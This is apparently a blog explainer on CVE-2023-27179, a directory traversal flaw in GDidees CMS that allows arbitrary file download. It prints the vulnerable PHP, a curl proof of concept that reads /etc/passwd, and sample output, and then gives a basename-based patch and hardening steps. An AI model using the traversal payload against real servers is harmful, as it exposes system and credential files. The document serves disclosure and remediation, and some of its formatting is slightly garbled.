GDidees CMS is a content management system that’s relatively popular for building small websites and personal projects. In early 2023, a critical vulnerability was disclosed in versions up to v3.9.1, allowing attackers to download arbitrary files from the server. This security issue (CVE-2023-27179) exists in the file / _admin/imgdownload.php and is formatted around poor input handling and improper file access control.
In this article, we’ll break down what this vulnerability is all about, how it works, and how an attacker can exploit it. We’ll use simple language—no tricky jargon—and include code snippets and references to help you understand the risk and remediation.
CVE ID: CVE-2023-27179
- Affected endpoint: / _admin/imgdownload.php
What’s the Problem?
The script imgdownload.php is supposed to let administrators download image files from the server. However, it doesn’t properly check or sanitize the filename parameter. This poor input validation makes it possible for attackers to request any file from the server, including sensitive files like /etc/passwd, configuration files, or other data that should never leave the server.
How the Vulnerability Works
Let's look at the code that causes the problem. In simplified form, the logic in imgdownload.php looks roughly like this:
<?php
// _admin/imgdownload.php
if(isset($_GET['filename'])) {
$filename = $_GET['filename'];
$file = "../uploads/images/" . $filename;
if(file_exists($file)) {
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($file) . '"');
readfile($file);
} else {
echo "File does not exist.";
}
}
?>
Input validation!
- The code joins ../uploads/images/ with the user-supplied filename and serves it up if it exists.
- Attackers can use directory traversal (e.g., ../../../../../etc/passwd) to escape the image uploads folder and read any file the webserver can access.
PoC: Exploiting CVE-2023-27179
Here’s a proof-of-concept (PoC) that shows how an attacker could download the server’s /etc/passwd file (on Linux systems):
### Example Exploit: Download /etc/passwd
Just use your browser or an HTTP tool like curl with the following URL
http://victim-site.com/_admin/imgdownload.php?filename=../../../../../../etc/passwd
Or from the command line
curl "http://victim-site.com/_admin/imgdownload.php?filename=../../../../../../etc/passwd"
If there is no input sanitization in place, the server will respond with the contents of /etc/passwd.
Screenshot of a possible output
root:x:::root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
...
Gather information needed for further attacks (escalation, code execution, etc.)
If the web server has access to any file, the attacker can probably grab it.
Update: Best to upgrade to the latest version as soon as a patch is published.
2. Patch the vulnerable code. Add input validation to reject directory traversal and sanitize the filename input. For example:
<?php
if(isset($_GET['filename'])) {
$filename = basename($_GET['filename']); // basename removes directory paths
$file = "../uploads/images/" . $filename;
if(file_exists($file)) {
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($file) . '"');
readfile($file);
} else {
echo "File does not exist.";
}
}
?>
3. Harden server permissions: Limit the web server’s rights so it can’t access sensitive files outside the web directory.
4. Restrict access to / _admin/ via .htaccess or other measures.
References
- CVE-2023-27179 at NVD
- Exploit details on Exploit-DB
- Packet Storm Security advisory
Summary
CVE-2023-27179 is a harsh reminder to never trust user input. Arbitrary file download bugs are cheap and effective for attackers. Website admins using GDidees CMS should update their installations and review any admin-facing download code for similar issues.
If you spot this bug on a website, let the owner know ASAP—they could be one request away from getting pwned.
Timeline
Published on: 04/11/2023 12:15:00 UTC
Last modified on: 04/17/2023 17:15:00 UTC